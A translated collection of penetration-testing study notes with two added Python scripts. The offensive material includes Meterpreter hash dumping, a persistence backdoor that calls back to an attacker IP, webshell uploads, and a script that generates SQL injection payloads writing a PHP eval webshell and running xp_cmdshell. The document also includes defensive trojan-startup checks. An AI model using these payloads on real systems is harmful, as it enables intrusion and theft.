[Penetration Notes _ Guangwai Security Group] (SI)

Source: Internet
Author: User

Our new column, [Study Notes], shares the learning experience of our colleagues. These penetration notes are serialized by the 91ri.org Network Security Research Office: short but useful penetration tips that the editors accumulated while reading and studying. The plan is to update once a week, and to keep the quality up each installment contains about 20 notes. Other readers are welcome to share their notes with us.

1. If a webshell's file upload fails with a "missing object" error, try writing a one-line webshell (一句话木马) instead, connect to it with China Chopper (菜刀, "kitchen knife"), and upload the file through that connection.

2. Use Meterpreter's hashdump to dump the Windows password hashes:

meterpreter> getuid       // show the current privilege level
meterpreter> getsystem    // escalate to SYSTEM
meterpreter> run hashdump

3. The website http://www.md5decrypter.co.uk/ can look up NTLM/LM hashes online. (Editor's note: this site also has a high hit rate for MD5 cracking.)

4. Create a backdoor with Meterpreter:

meterpreter> run persistence -A -S -U -i 60 -p 4321 -r <attacker IP>

-A automatically starts a matching multi/handler on the attacker's machine. -S installs the backdoor as a service so it is loaded when Windows starts. -U makes it run automatically when a user logs on. -i sets the interval in seconds between the backdoor's connect-back attempts to the handler. -p is the handler port. -r is the IP address the backdoor connects back to, i.e. the attacker's machine, not the target's. Note that this script was later deprecated in favor of the post/windows/manage/persistence_exe module, and the dropped payload is readily caught by antivirus.


5. Defense in depth, mapped onto the OSI layers: a company hires patrol engineers for the physical lines (layer 1), implements port security on the workgroup switches (layer 2), puts access lists on the border router (layer 3), sets up a DMZ and packet filtering on the firewall (layer 4), deploys IDS/IPS for monitoring and blocking (layers 3 to 7), establishes SSL channels (layer 6), adds content filtering (layer 7), provides AAA services (layer 7), and performs vulnerability scanning (layers 4 to 7) and virus scanning (layer 7). -- Taken from "IT Security Interview Strategy".

6. IPS devices provide both attack detection and prevention. Deployed out of band on a mirror (SPAN) port they can only respond after the fact (for example by injecting TCP resets); deployed inline they can block the traffic directly.

7. To get a computer's name from its IP address: ping -a <ip address> (Windows ping; -a performs a reverse name lookup).

8. In the Windows folder, open system.ini. Under [boot], the shell line normally reads shell=Explorer.exe. If another file name follows it (shell=Explorer.exe <file name>), that extra program may be a Trojan.

9. Also in the Windows folder, open win.ini. Look for run= and load= lines; normally there is nothing after them. If a path or an unfamiliar file name follows, it may be a Trojan.

10. Trojans hide in many places; a common one is the Registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Check the values under it for unfamiliar executables; such files may be Trojans.

11. A web sniffer for capturing web pages: Aifei Web Detective (艾菲网页侦探) is an HTTP sniffer that captures and analyzes HTTP packets on the LAN and finds the HTTP traffic matching a filter.

12. Common Windows XP vulnerabilities: the RDP vulnerability, cleartext transmission of account names over the network, the UPnP buffer overflow, the hotkey vulnerability, and DoS vulnerabilities.

13. Common Windows 7 vulnerabilities: kernel-mode driver vulnerabilities, ancillary (auxiliary) driver vulnerabilities, the issues covered by the cumulative security updates for IE, vulnerabilities in the Color Control Panel, and .NET, Silverlight, and SharePoint vulnerabilities.

14. Software method for clearing a BIOS password: if you can get into the operating system, tools such as BiosPwds and CmosPwd can clear it. (Editor's note: don't get any ideas.)

15. Physical method for clearing a BIOS password: power off, use a suitable tool to pull the CMOS-clear jumper cap off the motherboard, move it from the pins marked 1 and 2 to the pins marked 2 and 3, then put it back in its original position and power on; the BIOS password is cleared. On an older machine, remove the CMOS battery instead, then short the battery holder's contacts with a conductive tool to discharge the CMOS and remove the password.

16. When MySQL has permission to read and write files (the FILE privilege), writing a file succeeds only if: single quotes are not escaped, because the INTO OUTFILE path must be a quoted string literal (so magic_quotes_gpc must be Off); the target file does not already exist, because MySQL will not overwrite it; and INTO OUTFILE is the last clause of the statement.

17. During privilege escalation, if you know the MySQL connection account and password you can try UDF escalation; the note assumes a Windows target (UDF escalation also works on Linux given a suitable shared library). If the MySQL service itself runs with high privileges, you can write a MOF file to get system privileges; that trick is Windows-only and relies on the old WMI MOF auto-compile behaviour, i.e. Windows XP/2003 and earlier.

18. If the target has the rsync service enabled (default port 873), try logging in without a password; if the module's permissions allow, you can read files from and upload files directly into the target site's directory.

19. If lcx does not work for port forwarding, try reDuh, but it is slow. (Slow enough to make you want to smash the keyboard.)

20. For numeric injection where single quotes are unavailable (MSSQL), there are two approaches: define the injected statement as a hex-encoded string in a variable @r and then exec(@r); or build the string with the char() function and the + concatenation operator.

This article is study notes written by the 91ri.org team.
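As an added example that is not part of the original notes, the following Python script applies the checks from tips 8 to 10 to constructed copies of system.ini, win.ini, and an HKCU Run key listing; the sample entries and the list of user-writable directories it treats as suspicious are assumptions for the demonstration, not a malware signature. On a real host you would feed it C:\Windows\system.ini, C:\Windows\win.ini, and the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`. The two INI checks mainly matter on older Windows versions; the Run key (and the many other autostart locations a tool such as Sysinternals Autoruns enumerates) is where to look today.

```python
from typing import Dict, List

# Constructed sample inputs (not captured from a real host); the odd entries are
# invented so that each check has something to flag.
SYSTEM_INI = """[boot]
shell=Explorer.exe C:\\Windows\\Temp\\svch0st.exe
[drivers]
wave=mmdrv.dll
"""

WIN_INI = """[windows]
load=
run=C:\\Users\\Public\\update.exe
NullPort=None
[fonts]
"""

# HKCU\Software\Microsoft\Windows\CurrentVersion\Run as value name -> command (constructed)
HKCU_RUN = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Updater": r"C:\Users\alice\AppData\Roaming\syshost.exe",
}

# Assumed heuristic: executables launched from these user-writable locations deserve a look.
SUSPICIOUS_DIRS = ("\\temp\\", "\\users\\public\\", "\\appdata\\roaming\\",
                   "\\downloads\\", "\\programdata\\")


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI parser: section -> {lowercased key: value}. Keeps empty values."""
    sections: Dict[str, Dict[str, str]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if sep:
            sections.setdefault(current, {})[key.strip().lower()] = value.strip()
    return sections


def executable_of(command: str) -> str:
    """First token of a command line, honouring a double-quoted path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def check_system_ini(text: str) -> List[str]:
    """Tip 8: [boot] shell= should launch Explorer.exe and nothing else."""
    shell = parse_ini(text).get("boot", {}).get("shell", "")
    findings: List[str] = []
    if not shell:
        return findings
    exe = executable_of(shell)
    if exe.replace("\\", "/").rsplit("/", 1)[-1].lower() != "explorer.exe":
        findings.append(f"system.ini shell= is not Explorer.exe: {shell}")
    head_len = len(exe) + 2 if shell.startswith('"') else len(exe)
    extra = shell[head_len:].strip()
    if extra:
        findings.append(f"system.ini shell= launches an extra program: {extra}")
    return findings


def check_win_ini(text: str) -> List[str]:
    """Tip 9: [windows] run= and load= are normally empty."""
    windows = parse_ini(text).get("windows", {})
    return [f"win.ini {key}= is set: {windows[key]}" for key in ("run", "load") if windows.get(key)]


def check_run_key(entries: Dict[str, str]) -> List[str]:
    """Tip 10: return the Run value names whose executable lives in a user-writable directory."""
    return [name for name, command in entries.items()
            if any(d in executable_of(command).lower() for d in SUSPICIOUS_DIRS)]


if __name__ == "__main__":
    for finding in check_system_ini(SYSTEM_INI) + check_win_ini(WIN_INI):
        print(finding)
    print("Run entries to review:", check_run_key(HKCU_RUN))
```

The directory heuristic deliberately leaves a legitimate entry under AppData\Local alone and flags the one under AppData\Roaming; tune SUSPICIOUS_DIRS for the environment and treat the output as a review list, not a verdict.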
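As an added example covering tips 16 and 20 (not code from the original notes), this Python script builds the quote-free MSSQL payloads and a MySQL INTO OUTFILE payload, and simulates what magic_quotes_gpc does to the latter. The vulnerable query shape, the three-column assumption and the webshell content are constructed. It shows why the note's conditions hold: the file content can be hex-encoded, but the OUTFILE path must be a quoted string literal, so one escaped quote kills the payload; and a clause the application appends after INTO OUTFILE is a syntax error unless it is commented out. Caveat: on MySQL 5.7 and later the secure_file_priv setting also restricts or disables INTO OUTFILE entirely.

```python
import re

# Constructed vulnerable query shape (not from a real application): the id parameter is
# concatenated into a numeric context and the application appends " LIMIT 1".
QUERY_PREFIX = "SELECT title, body, author FROM news WHERE id="
QUERY_SUFFIX = " LIMIT 1"


def addslashes(s: str) -> str:
    """What PHP's magic_quotes_gpc did to every request value: backslash-escape ' \" \\ and NUL."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def hex_literal(s: str) -> str:
    """0x.. literal that both MySQL and MSSQL accept in place of a quoted string."""
    return "0x" + s.encode("utf-8").hex()


def mysql_outfile_payload(path: str, content: str, columns: int) -> str:
    """UNION ... INTO OUTFILE payload. The file content is a hex literal (no quotes needed),
    but the path cannot be: INTO OUTFILE requires a quoted string literal. The trailing
    '-- -' comments out whatever the application appends, so INTO OUTFILE stays last."""
    cols = [hex_literal(content)] + ["NULL"] * (columns - 1)
    return f"-1 UNION SELECT {','.join(cols)} INTO OUTFILE '{path}'-- -"


def build_query(user_input: str, magic_quotes_gpc: bool) -> str:
    """Simulate the vulnerable page with magic_quotes_gpc On or Off."""
    value = addslashes(user_input) if magic_quotes_gpc else user_input
    return QUERY_PREFIX + value + QUERY_SUFFIX


def outfile_path_intact(sql: str) -> bool:
    """True if the OUTFILE path is still a well-formed quoted literal (not broken by \\')."""
    return re.search(r"INTO OUTFILE '[^'\\]*'", sql) is not None


def outfile_is_last_clause(sql: str) -> bool:
    """True if only a comment follows the OUTFILE path; MySQL rejects e.g. a LIMIT after it."""
    effective = sql.split("-- ", 1)[0]  # "-- " (with the space) opens a comment to end of line
    return re.search(r"INTO OUTFILE '[^']*'\s*$", effective) is not None


def mssql_hex_exec(stmt: str) -> str:
    """Quote-free MSSQL execution: hex-encode the statement into a varchar variable, then exec it.
    (For non-ASCII statements declare nvarchar and encode UTF-16LE instead.)"""
    return f"declare @r varchar(8000);set @r={hex_literal(stmt)};exec(@r)"


def mssql_char_exec(stmt: str) -> str:
    """Quote-free MSSQL execution built from char() and the + concatenation operator."""
    return "exec(" + "+".join(f"char({ord(c)})" for c in stmt) + ")"


if __name__ == "__main__":
    shell = "<?php @eval($_POST['c']); ?>"  # constructed one-line webshell as file content
    payload = mysql_outfile_payload("/var/www/html/s.php", shell, 3)  # assumes 3 columns
    for magic in (False, True):
        sql = build_query(payload, magic)
        print(f"magic_quotes_gpc={'On' if magic else 'Off'}: "
              f"path intact={outfile_path_intact(sql)}, last clause={outfile_is_last_clause(sql)}")
    print(mssql_hex_exec("exec master..xp_cmdshell 'whoami'"))
    print(mssql_char_exec("select @@version"))
```

Run it and the magic_quotes_gpc=On line shows the path check failing while the hex-encoded content is untouched, which is exactly the note's point; dropping the trailing comment makes the last-clause check fail because the application's LIMIT then follows INTO OUTFILE.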
